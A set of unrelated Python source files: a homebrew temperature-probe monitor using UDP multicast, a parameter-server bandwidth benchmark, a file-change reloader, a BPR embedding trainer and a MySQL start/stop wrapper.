self.probesToMonitor[self.cfg.hltProbe] = False
self._targetHlt = (-1, -1, -1)
self._targetMash = (-1, -1, -1)
self._targetSparge = (-1, -1, -1)
self._targetFerm = (-1, -1, -1)
self._targetBoil = (-1, -1, -1)
self._mode = "unknown-mode"
self._brewlog = "<unknown brewlog.>"
self._recipe = "<unknown recipe>"
self._loop_multicast_socket = True
self.mcastMembership = False
self.currentScenario = "unknown"
self.currentTemperatures = {}
self.currentStatus = 0 # 0 = temperatureing
self.doTemperatureing = False
# odd readings
self.odd_readings = {}
# we need to supress results of 0 and 85 if they are the instant result
self.lastResult = {}
if os.path.exists("simulator"):
try:
os.mkdir("ipc/fake1wire")
except:
pass
self.tempBaseDir = "ipc/fake1wire/"
else:
self.tempBaseDir = "/sys/bus/w1/devices/"
def uncontrol(self):
pass
def __del__(self):
self.uncontrol()
def _log(self, msg):
if self.logging == 1:
syslog.syslog(syslog.LOG_DEBUG, msg)
elif self.logging == 2:
sys.stderr.write("%s\n" % (msg))
def _err(self, msg):
syslog.syslog(syslog.LOG_ERR, msg)
sys.stderr.write("%s\n" % (msg))
def broadcastResult(self):
# We should send a broadcast every second whilst we are alive.
sendSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sendSocket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 3)
controlMessage = {}
controlMessage['_operation'] = 'temperatureResults1'
controlMessage['_checksum'] = " "
controlMessage['currentStatus'] = self.currentStatus
controlMessage['currentResult'] = self.currentTemperatures
# we reflect _mode so we don't have to have everything listen to it
controlMessage['_mode'] = self._mode
# we also refelct the target temperature information which we got from
# governort
controlMessage['tempTargetHlt'] = self._targetHlt
controlMessage['tempTargetSparge'] = self._targetSparge
controlMessage['tempTargetMash'] = self._targetMash
controlMessage['tempTargetBoil'] = self._targetBoil
controlMessage['tempTargetFerm'] = self._targetFerm
controlMessage['_brewlog'] = self._brewlog
controlMessage['_recipe'] = self._recipe
controlMessage['mashA'] = self.cfg.mashAProbe
controlMessage['mashB'] = self.cfg.mashBProbe
controlMessage['hlt'] = self.cfg.hltProbe
controlMessage['boil'] = self.cfg.boilProbe
controlMessage['ferm'] = self.cfg.fermProbe
checksum = "%s%s" % (controlMessage, self.cfg.checksum)
        controlMessage['_checksum'] = hashlib.sha1(checksum).hexdigest()
msg = json.dumps(controlMessage)
msg = "%s%s" % (msg, " " * (1200 - len(msg)))
if len(msg) > 1200:
self._err("Cannot send message - packet too big")
return
sendSocket.sendto(msg, (self.cfg.mcastGroup, self.cfg.mcastTemperaturePort))
sendSocket.close()
def _reject_result(self, probe, temperature, reason="unspecified"):
self.odd_readings[probe].append(temperature)
self._log('rejecting result %s %s (reason: %s)' % (probe, temperature, reason))
self.currentTemperatures[probe] = {'timestamp': time.time(), 'temperature': temperature, 'valid': False}
def _accept_adjust_and_add_a_reading(self, probe, temperature):
adjust = 0
if self.cfg.probeAdjustments.has_key(probe):
for (adjustMin, adjustMax, adjustAmount) in self.cfg.probeAdjustments[probe]:
if temperature >= adjustMin and temperature < adjustMax:
adjust = adjustAmount
temperature = temperature + adjust
break
self._log("Accepting result %s lastResult %s (Adjusted by %s)" % (temperature, self.lastResult[probe], adjust))
self.currentTemperatures[probe] = {'timestamp': time.time(), 'temperature': temperature, 'valid': True}
self.lastResult[probe] = temperature
self.odd_readings[probe] = []
def _read_temperature_from_external_probe(self, probe):
temperature = 0
ok = False
text = "NON"
try:
o = open("%s/%s/w1_slave" % (self.tempBaseDir, probe))
text = o.readline()
temp = o.readline()
o.close()
except:
pass
if text.count("YES") and self.rxTemp.match(temp): # CRC=NO for failed results
(temp,) = self.rxTemp.match(temp).groups()
temperature = float(temp) / 1000
ok = True
return (temperature, ok)
def _get_probes_to_monitor(self):
probes = []
for probe in os.listdir(self.tempBaseDir):
if probe[0:2] == "28":
if self.probesToMonitor.has_key(probe):
probes.append(probe)
return probes
def _error_reading_from_external_temperature_probe(self, probe):
"""
A reading of exactly 85 can be an error from the 1wire probe.
This rejects a reading of exactly 85 if the preceeding reading isn't
close enough
"""
if self.lastResult[probe] > 80 and self.lastResult[probe] < 85:
pass
elif self.lastResult[probe] > 85:
pass
else:
self._reject_result(probe, 85, '85 indicates mis-read')
return True
return False
def getResult(self):
for probe in self._get_probes_to_monitor():
# A place to store odd results
if not self.odd_readings.has_key(probe):
self.odd_readings[probe] = []
if self.probesToMonitor[probe]:
(temperature, ok) = self._read_temperature_from_external_probe(probe)
if ok:
if not self.lastResult.has_key(probe):
self.lastResult[probe] = 0
# Exactly 85 indictes misread
if temperature == 85 and self._error_reading_from_external_temperature_probe(probe):
return True
if (self.lastResult[probe]) == 0 or len(self.odd_readings[probe]) > 5:
self._accept_adjust_and_add_a_reading(probe, temperature)
else:
if temperature > self.lastResult[probe] * 1.05 or temperature < self.lastResult[probe] * 0.95:
self._reject_result(probe, temperature, '+/- 5%% swing')
else:
self._accept_adjust_and_add_a_reading(probe, temperature)
time.sleep(3.0)
def submission(self):
self._log("Submitting to control of Controller")
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, 4)
self.sock.bind(('', self.cfg.mcastPort))
mreq = struct.pack("4sl", socket.inet_aton(self.cfg.mcastGroup), socket.INADDR_ANY)
self.sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
self.mcastMembership = True
if os.path.exists("ipc/overrideModeFerm"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.fermProbe] = True
try:
fhandle = open('ipc/overrideModeFerm')
                target = float(fhandle.readline().rstrip())
fhandle.close()
except:
target = 17
self._targetFerm = (target - 0.3, target + 0.3, target)
self._mode = 'ferm'
print "Fermentation override mode - target"
elif os.path.exists("/tmp/standalone-temp-active"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.tempProbe] = True
self._targetFerm = 19
while self._loop_multicast_socket == True:
(data, addr) = self.sock.recvfrom(1200)
self.decodeMessage(data)
def decodeMessage(self, data):
"""
"""
try:
cm = json.loads(data)
except:
self._log("Error unpickling input message\n%s" % (data))
return
checksum = cm['_checksum']
cm['_checksum'] = " "
ourChecksum = hashlib.sha1("%s%s" % (cm, self.cfg.checksum)).hexdigest()
self._mode = cm['_mode']
if cm.has_key("_recipe"):
self._recipe = cm['_recipe']
if cm.has_key("_brewlog"):
self._brewlog = cm['_brewlog']
# looks like we receive targets out of cm['boil'], cm['ferm'], cm['mash'], cm['hlt']
# these come from governor via sendOrders()
# so now we are sending this back on the broadcast of our results, with tempTarget (HLT,Boil, Ferm)
# and tempTarget2 (Mash)
self._targetHlt = (-1, -1, -1)
self._targetMash = (-1, -1, -1)
self._targetSparge = (-1, -1, -1)
self._targetFerm = (-1, -1, -1)
self._targetBoil = (-1, -1, -1)
if os.path.exists('ipc/single-temp-probe'):
self.probesToMonitor[self.cfg.hltProbe] = True
elif cm['_mode'].count("pump") or cm['_mode'].count("cool") or cm['_mode'].count("ferm-wait"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.fermProbe] = True
self.probesToMonitor[self.cfg.boilProbe] = True
self.probesToMonitor[self.cfg.mashAProbe] = False
self.probesToMonitor[self.cfg.mashBProbe] = False
self.probesToMonitor[self.cfg.hltProbe] = False
self._targetFerm = cm['ferm']
self._targetBoil = cm['boil']
elif cm['_mode'].count("ferm"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.fermProbe] = True
self.probesToMonitor[self.cfg.boilProbe] = False
self.probesToMonitor[self.cfg.mashAProbe] = False
self.probesToMonitor[self.cfg.mashBProbe] = False
self.probesToMonitor[self.cfg.hltProbe] = False
self._targetFerm = cm['ferm']
elif cm['_mode'].count("sparge"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.fermProbe] = False
self.probesToMonitor[self.cfg.boilProbe] = False
self.probesToMonitor[self.cfg.hltProbe] = True
self.probesToMonitor[self.cfg.mashAProbe] = True
self.probesToMonitor[self.cfg.mashBProbe] = True
self._targetMash = cm['mash']
elif cm['_mode'].count("delayed_HLT"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.hltProbe] = True
self.probesToMonitor[self.cfg.fermProbe] = True
self.probesToMonitor[self.cfg.boilProbe] = False
self.probesToMonitor[self.cfg.mashAProbe] = False
self.probesToMonitor[self.cfg.mashBProbe] = False
self._targetHlt = cm['hlt']
elif cm['_mode'].count("hlt") and cm['_mode'].count("mash"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.hltProbe] = True
self.probesToMonitor[self.cfg.mashAProbe] = True
self.probesToMonitor[self.cfg.mashBProbe] = True
self.probesToMonitor[self.cfg.fermProbe] = True
self.probesToMonitor[self.cfg.boilProbe] = False
self._targetHlt = cm['hlt']
self._targetMash = cm['mash']
elif cm['_mode'].count("hlt"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.hltProbe] = True
self.probesToMonitor[self.cfg.mashAProbe] = False
self.probesToMonitor[self.cfg.mashBProbe] = False
self.probesToMonitor[self.cfg.fermProbe] = False
self.probesToMonitor[self.cfg.boilProbe] = False
self._targetHlt = cm['hlt']
elif cm['_mode'].count("delayed_HLT"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.hltProbe] = True
self.probesToMonitor[self.cfg.mashAProbe] = False
self.probesToMonitor[self.cfg.mashBProbe] = False
self.probesToMonitor[self.cfg.fermProbe] = False
self.probesToMonitor[self.cfg.boilProbe] = False
self._targetHlt = cm['hlt']
elif cm['_mode'].count("boil"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.boilProbe] = True
self.probesToMonitor[self.cfg.hltProbe] = False
self.probesToMonitor[self.cfg.mashAProbe] = False
self.probesToMonitor[self.cfg.mashBProbe] = False
self.probesToMonitor[self.cfg.fermProbe] = False
self._targetBoil = cm['boil']
elif cm['_mode'].count("mash"):
self.doTemperatureing = True
self.probesToMonitor[self.cfg.mashAProbe] = True
self.probesToMonitor[self.cfg.mashBProbe] = True
self.probesToMonitor[self.cfg.fermProbe] = False
self.probesToMonitor[self.cfg.boilProbe] = False
self.probesToMonitor[self.cfg.hltProbe] = False
self._targetMash = cm['mash']
else:
self.probesToMonitor[self.cfg.mashAProbe] = False
self.probesToMonitor[self.cfg.mashBProbe] = False
self.probesToMonitor[self.cfg.fermProbe] = False
self.probesToMonitor[self.cfg.boilProbe] = False
self.probesToMonitor[self.cfg.hltProbe] = False
self.doTemperatureing = False
def start(self):
self._log("Starting pitmTemperature")
while True:
self.getResult()
self.broadcastResult()
time.sleep(1)
if __name__ == '__main__':
try:
controller = pitmTemperature()
# get under the control of the contoller
controlThread = threading.Thread(target=controller.submission)
controlThread.daemon = True
controlThread.start()
controller.start()
except KeyboardInterrupt:
controller.uncontrol()
|
test_bandwidth.py
|
from athena import ndarray, optimizer
from athena import gpu_ops as ad
import time, os, sys
import yaml
import multiprocessing
import argparse
import signal
import numpy as np
import ctypes
from tqdm import tqdm
from concurrent.futures import ThreadPoolExecutor
import threading
def pointer(arr):
assert(arr.data.c_contiguous)
assert(arr.dtype == np.long)
return ctypes.cast(arr.ctypes.data, ctypes.POINTER(ctypes.c_long))
def test(func_name, nitem=2000, item_len=10000, ind_len=500, max_thread=10, ret_ans=False):
func_name = func_name.lower()
ctx = ndarray.cpu(0)
rank = int(os.environ["WORKER_ID"])
nrank = int(os.environ["DMLC_NUM_WORKER"])
comm = ad.get_worker_communicate()
byte_count = 0
if func_name == 'pushnpull':
inarr = ndarray.array(np.random.rand(nitem, item_len), ctx=ctx)
outarr = ndarray.array(np.random.rand(nitem, item_len), ctx=ctx)
def func(name):
comm.Push(name, inarr.handle, None)
comm.Pull(name, outarr.handle)
comm.Wait(name)
nonlocal byte_count
byte_count += nitem * item_len * 4 * 2
elif func_name == 'pushpull':
inarr = ndarray.array(np.random.rand(nitem, item_len), ctx=ctx)
outarr = ndarray.array(np.random.rand(nitem, item_len), ctx=ctx)
def func(name):
comm.DDPushPull(name, inarr.handle, outarr.handle, None)
comm.Wait(name)
nonlocal byte_count
byte_count += nitem * item_len * 4 * 2
elif func_name == 'sparsepushnpull':
inarr = ndarray.array(np.random.rand(ind_len, item_len), ctx=ctx)
outarr = ndarray.array(np.random.rand(nitem, item_len), ctx=ctx)
def func(name):
np_ind = np.random.randint(low=0, high=nitem, size=(ind_len,))
inind = ndarray.array(np_ind.astype(np.float32), ctx=ctx)
uni_ind_len = np.unique(np_ind).size
comm.SparsePush(name, inind.handle, inarr.handle, None)
comm.Pull(name, outarr.handle)
comm.Wait(name)
nonlocal byte_count
byte_count += (nitem + uni_ind_len) * item_len * 4
elif func_name == 'sparsepushnsparsepull':
inarr = ndarray.array(np.random.rand(ind_len, item_len), ctx=ctx)
outarr = ndarray.array(np.random.rand(ind_len, item_len), ctx=ctx)
def func(name):
np_inind = np.random.randint(low=0, high=nitem, size=(ind_len,))
np_outind = np.random.randint(low=0, high=nitem, size=(ind_len,))
inind = ndarray.array(np_inind.astype(np.float32), ctx=ctx)
outind = ndarray.array(np_outind.astype(np.float32), ctx=ctx)
uni_inind_len = np.unique(np_inind).size
uni_outind_len = np.unique(np_outind).size
comm.SparsePush(name, inind.handle, inarr.handle, None)
comm.SparsePull(name, outind.handle, outarr.handle)
comm.Wait(name)
nonlocal byte_count
byte_count += (uni_inind_len + uni_outind_len) * item_len * 4
elif func_name == 'push':
inarr = ndarray.array(np.random.rand(nitem, item_len), ctx=ctx)
def func(name):
comm.Push(name, inarr.handle, None)
comm.Wait(name)
nonlocal byte_count
byte_count += nitem * item_len * 4
elif func_name == 'pull':
outarr = ndarray.array(np.random.rand(nitem, item_len), ctx=ctx)
def func(name):
comm.Pull(name, outarr.handle)
comm.Wait(name)
nonlocal byte_count
byte_count += nitem * item_len * 4
elif func_name == 'sparsepush':
inarr = ndarray.array(np.random.rand(ind_len, item_len), ctx=ctx)
def func(name):
np_inind = np.random.randint(low=0, high=nitem, size=(ind_len,))
inind = ndarray.array(np_inind.astype(np.float32), ctx=ctx)
uni_inind_len = np.unique(np_inind).size
comm.SparsePush(name, inind.handle, inarr.handle, None)
comm.Wait(name)
nonlocal byte_count
byte_count += uni_inind_len * item_len * 4
elif func_name == 'sparsepull':
outarr = ndarray.array(np.random.rand(ind_len, item_len), ctx=ctx)
def func(name):
np_outind = np.random.randint(low=0, high=nitem, size=(ind_len,))
outind = ndarray.array(np_outind.astype(np.float32), ctx=ctx)
uni_outind_len = np.unique(np_outind).size
comm.SparsePull(name, outind.handle, outarr.handle)
comm.Wait(name)
nonlocal byte_count
byte_count += uni_outind_len * item_len * 4
elif func_name == 'sdpushpull':
inarr = ndarray.array(np.random.rand(ind_len, item_len), ctx=ctx)
outarr = ndarray.array(np.random.rand(nitem, item_len), ctx=ctx)
def func(name):
np_inind = np.random.randint(low=0, high=nitem, size=(ind_len,))
inind = ndarray.array(np_inind.astype(np.float32), ctx=ctx)
uni_inind_len = np.unique(np_inind).size
comm.SDPushPull(name, inind.handle, inarr.handle, outarr.handle, None)
comm.Wait(name)
nonlocal byte_count
byte_count += (uni_inind_len + nitem) * item_len * 4
elif func_name == 'sspushpull':
inarr = ndarray.array(np.random.rand(ind_len, item_len), ctx=ctx)
outarr = ndarray.array(np.random.rand(ind_len, item_len), ctx=ctx)
def func(name):
np_inind = np.random.randint(low=0, high=nitem, size=(ind_len,))
np_outind = np.random.randint(low=0, high=nitem, size=(ind_len,))
inind = ndarray.array(np_inind.astype(np.float32), ctx=ctx)
uni_inind_len = np.unique(np_inind).size
outind = ndarray.array(np_outind.astype(np.float32), ctx=ctx)
uni_outind_len = np.unique(np_outind).size
comm.SSPushPull(name, inind.handle, inarr.handle, outind.handle, outarr.handle, None)
comm.Wait(name)
nonlocal byte_count
byte_count += (uni_inind_len + uni_outind_len) * item_len * 4
else:
assert False
if 'sparse' in func_name or func_name in ('sdpushpull', 'sspushpull'):
arr_len = ctypes.c_int(nitem)
arr_wid = ctypes.c_int(item_len)
sparse_init = ctypes.c_int(1)
else:
arr_len = ctypes.c_int(nitem * item_len)
arr_wid = ctypes.c_int(1)
sparse_init = ctypes.c_int(0)
for i in range(max_thread):
comm.InitTensor(i, sparse_init, arr_len, arr_wid, ctypes.c_int(0), ctypes.c_double(0), ctypes.c_double(1))
# print("data init")
t = ThreadPoolExecutor(max_workers=max_thread)
if ret_ans:
task_list = [None for i in range(max_thread)]
for i in range(max_thread):
task_list[i] = t.submit(func, i)
curByte = byte_count
start = time.time()
cnt = 0
while cnt < 30:
for i in range(max_thread):
if task_list[i].done():
cnt += 1
task_list[i] = t.submit(func, i)
speed = (byte_count - curByte) / (time.time() - start) / 2 ** 20
t.shutdown()
for i in range(max_thread):
comm.ClearOnServer(i)
comm.Clear(i)
return speed
else:
def watch():
start = time.time()
while True:
time.sleep(1)
speed = byte_count / (time.time() - start)
print("speed : {} MB/s".format(speed / 2**20))
task_list = [None for i in range(max_thread)]
threading.Thread(target=watch).start()
while True:
for i in range(max_thread):
if task_list[i] is None or task_list[i].done():
task_list[i] = t.submit(func, i)
def test_dense_n_draw(range_size, func, trial=5, use_text=False):
assert func in ('pushpull', 'push', 'pull', 'pushnpull')
assert trial >= 3
ans = {}
for i in tqdm(range_size):
temps = []
for _ in range(trial):
temps.append(test(func, i, 1, ret_ans=True))
temps.remove(max(temps))
temps.remove(min(temps))
ans[i] = sum(temps) / (trial - 2)
# ans[i] = test(func, i, 1, ret_ans=True)
print(ans)
import matplotlib.pyplot as plt
xs = list(ans.keys())
ys = list(ans.values())
plt.bar(xs, ys, width=range_size.step // 2)
plt.xlabel('Data Size')
plt.ylabel('Bandwidth MB/s')
plt.title('Bandwidth of ' + func)
if use_text:
for xx, yy in zip(xs, ys):
plt.text(xx, yy + 20, '%.0f' % yy, ha='center', va='bottom')
plt.savefig('test_dense_bandwidth.png')
def test_sparse_n_draw(range_ind_len, range_item_len, func, trial=5, use_text=False):
assert func in ('sparsepush', 'sparsepull')
assert trial >= 3
ans = {}
for i in tqdm(range_ind_len):
for j in range_item_len:
nitem = 5 * i
temps = []
for _ in range(trial):
temps.append(test(func, nitem, j, i, ret_ans=True))
temps.remove(max(temps))
temps.remove(min(temps))
ans[(i, j)] = sum(temps) / (trial - 2)
# ans[(i, j)] = test(func, nitem, j, i, ret_ans=True)
print(ans)
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
xs, ys = [], []
for k in ans.keys():
xs.append(k[0])
ys.append(k[1])
ax = plt.subplot(111, projection='3d')
zs = list(ans.values())
ax.bar3d([xx - range_ind_len.step // 4 for xx in xs], [yy - range_item_len.step // 4 for yy in ys], np.zeros_like(xs), range_ind_len.step // 2, range_item_len.step // 2, zs)
if use_text:
for xx, yy, zz in zip(xs, ys, zs):
ax.text(xx, yy, zz, '%.0f' % zz, ha='center', va='bottom')
ax.set_xlabel('Index Size')
ax.set_ylabel('Item Length')
ax.set_zlabel('Bandwidth MB/s')
ax.set_title('Bandwidth of ' + func)
plt.savefig('test_sparse_bandwidth.png')
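# Entry point for each spawned process: export the per-role environment from the
# YAML config, then run the server / worker / scheduler loop accordingly.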
def start_process(settings, args):
for key, value in settings.items():
os.environ[key] = str(value)
if os.environ['DMLC_ROLE'] == "server":
ad.server_init()
ad.server_finish()
elif os.environ['DMLC_ROLE'] == "worker":
ad.worker_init()
test(args.func)
# test_dense_n_draw(range(100000, 1000000, 100000), 'pushpull')
# test_sparse_n_draw(range(100, 600, 100), range(1000, 6000, 1000), 'sparsepush')
ad.worker_finish()
elif os.environ['DMLC_ROLE'] == "scheduler":
ad.scheduler_init()
ad.scheduler_finish()
else:
raise ValueError("Unknown role", os.environ['DMLC_ROLE'])
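# Ctrl+C in the launcher kills every spawned role process before exiting.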
def signal_handler(signal, frame):
print("SIGINT signal caught, stop Training")
for proc in process_list:
proc.kill()
exit(0)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--config", default='./settings/local_s2_w1.yml')
parser.add_argument("--func", default='pushpull')
args = parser.parse_args()
assert args.func in ('pushpull', 'pushnpull', 'sparsepushnpull', 'sparsepushnsparsepull', \
'push', 'pull', 'sparsepush', 'sparsepull', 'sdpushpull', 'sspushpull')
    with open(args.config) as config_file:
        settings = yaml.load(config_file, Loader=yaml.FullLoader)
process_list = []
for key, value in settings.items():
if key != 'shared':
proc = multiprocessing.Process(target=start_process, args=[value, args])
process_list.append(proc)
proc.start()
signal.signal(signal.SIGINT, signal_handler)
for proc in process_list:
proc.join()
|
statreload.py
|
import multiprocessing
import os
import signal
import time
from pathlib import Path
HANDLED_SIGNALS = (
signal.SIGINT, # Unix signal 2. Sent by Ctrl+C.
signal.SIGTERM, # Unix signal 15. Sent by `kill <pid>`.
)
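# Minimal stat()-based auto-reloader: run the target in a spawned subprocess and
# restart it whenever the mtime of a watched .py file changes.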
class StatReload:
def __init__(self, config):
self.config = config
self.should_exit = False
self.reload_count = 0
self.mtimes = {}
def handle_exit(self, sig, frame):
self.should_exit = True
def run(self, target, *args, **kwargs):
pid = os.getpid()
logger = self.config.logger_instance
logger.info("Started reloader process [{}]".format(pid))
for sig in HANDLED_SIGNALS:
signal.signal(sig, self.handle_exit)
spawn = multiprocessing.get_context("spawn")
process = spawn.Process(target=target, args=args, kwargs=kwargs)
process.start()
while process.is_alive() and not self.should_exit:
time.sleep(0.1)
if self.should_restart():
self.clear()
os.kill(process.pid, signal.SIGTERM)
process.join()
process = spawn.Process(target=target, args=args, kwargs=kwargs)
process.start()
self.reload_count += 1
logger.info("Stopping reloader process [{}]".format(pid))
def clear(self):
self.mtimes = {}
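    # Returns True once the first changed .py file is found; mtimes seen for the
    # first time are only recorded, so a freshly started process never restarts immediately.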
def should_restart(self):
for filename in self.iter_py_files():
try:
mtime = os.stat(filename).st_mtime
            except OSError:  # pragma: nocover
continue
old_time = self.mtimes.get(filename)
if old_time is None:
self.mtimes[filename] = mtime
continue
elif mtime > old_time:
display_path = os.path.normpath(filename)
if Path.cwd() in Path(filename).parents:
display_path = os.path.normpath(os.path.relpath(filename))
message = "Detected file change in '%s'. Reloading..."
self.config.logger_instance.warning(message, display_path)
return True
return False
def iter_py_files(self):
for reload_dir in self.config.reload_dirs:
for subdir, dirs, files in os.walk(reload_dir):
for file in files:
filepath = subdir + os.sep + file
if filepath.endswith(".py"):
yield filepath
|
bpr.py
|
from pysmore.libs import graph, optimizer, embedding, util
import multiprocessing as mp
### global variables ###
globalVariables = {
'graph': None,
'optimizer': optimizer.get_margin_bpr_loss,
'updater': embedding.update_l2_embedding,
'progress': util.print_progress,
'l2_reg': 0.0001,
'init_alpha': 0.025,
'num_negative': 5
}
current_update_times = mp.RawValue('i', 0)
userEmbed = None
itemEmbed = None
######
### user functions ###
def create_graph(train_path, embedding_dimension=64, delimiter='\t'):
global globalVariables
global userEmbed
global itemEmbed
globalVariables['graph'] = graph.Graph(train_path, delimiter=delimiter, mode='edge')
print('create embeddings...', end='', flush=True)
userEmbed = embedding.create_embeddings_unsafe(
amount=globalVariables['graph'].vertex_count,
dimensions=embedding_dimension)
itemEmbed = embedding.create_embeddings_unsafe(
amount=globalVariables['graph'].context_count,
dimensions=embedding_dimension)
print('DONE', flush=True)
return userEmbed, globalVariables['graph'].vertex_mapper, itemEmbed, globalVariables['graph'].context_mapper
def set_param(params):
global globalVariables
for key in params:
globalVariables[key] = params[key]
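# Spawn `workers` learner processes; each performs total_update_times / workers
# BPR updates, and the learning rate is decayed linearly toward min_alpha.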
def train(update_times=10, workers=1):
global globalVariables
globalVariables['total_update_times'] = int(update_times * 1000000)
globalVariables['workers'] = workers
globalVariables['worker_update_times'] = int((update_times * 1000000)/workers)
globalVariables['min_alpha'] = globalVariables['init_alpha'] * 1000 / globalVariables['total_update_times']
util.optimize_numpy_multiprocessing(workers)
processes = []
for i in range(workers):
p = mp.Process(target=learner, args=())
p.start()
processes.append(p)
for p in processes:
p.join()
current_update_times.value = 0
globalVariables['progress'](1.0)
def save_embeddings(file_prefix="bpr"):
global globalVariables
global userEmbed
global itemEmbed
print()
embedding.save_embeddings(userEmbed, globalVariables['graph'].vertices, file_prefix+'_vertex')
embedding.save_embeddings(itemEmbed, globalVariables['graph'].contexts, file_prefix+'_context')
######
### main learner ###
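# One worker loop: draw a (user, positive item) edge, sample `num_negative`
# negative items, apply the BPR gradients with L2 regularization, and update the
# shared progress counter every `monitor_flag` iterations.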
def learner():
globalVariables['graph'].cache_edge_samples(globalVariables['worker_update_times'])
globalVariables['progress'](0.0)
monitor_flag = int(1e3)
_learning_rate = globalVariables['init_alpha']
for i in range(1, globalVariables['worker_update_times']+1):
user, user_idx, item_pos, item_pos_idx, weight = \
globalVariables['graph'].draw_an_edge_from_sample()
item_neg, item_neg_idxs = globalVariables['graph'].draw_contexts_uniformly(amount=globalVariables['num_negative'])
for item_neg_idx in item_neg_idxs:
user_embedding = userEmbed[user_idx]
            item_pos_embedding = itemEmbed[item_pos_idx]  # the positive context should be re-sampled every time
item_neg_embedding = itemEmbed[item_neg_idx]
user_loss, item_pos_loss, item_neg_loss = \
globalVariables['optimizer'](user_embedding, item_pos_embedding, item_neg_embedding)
globalVariables['updater'](userEmbed, user_idx, user_loss, _learning_rate, globalVariables['l2_reg'])
globalVariables['updater'](itemEmbed, item_pos_idx, item_pos_loss, _learning_rate, globalVariables['l2_reg'])
globalVariables['updater'](itemEmbed, item_neg_idx, item_neg_loss, _learning_rate, globalVariables['l2_reg'])
if i % monitor_flag == 0:
current_progress_percentage = current_update_times.value / globalVariables['total_update_times']
_learning_rate = globalVariables['init_alpha'] * (1.0 - current_progress_percentage)
_learning_rate = max(globalVariables['min_alpha'], _learning_rate)
current_update_times.value += monitor_flag
globalVariables['progress'](current_progress_percentage)
######
|
manage_mysql_script.py
|
import os
import threading
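# Thin wrapper around the mysqld / mysqladmin binaries: the install path is read
# from data/mysql_path.txt and the server is started on a background thread.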
class Manage_Mysql:
def get_path(self):
        with open('data/mysql_path.txt') as path_file:
            lines = [line.rstrip('\n') for line in path_file]
        return lines[0]
def start_mysql(self):
        path = self.get_path()
print(path + 'mysqld')
os.system(path + 'mysqld')
def start(self):
threading.Thread(target=self.start_mysql).start()
def stop(self):
        path = self.get_path()
os.system(path + 'mysqladmin -u root shutdown')
|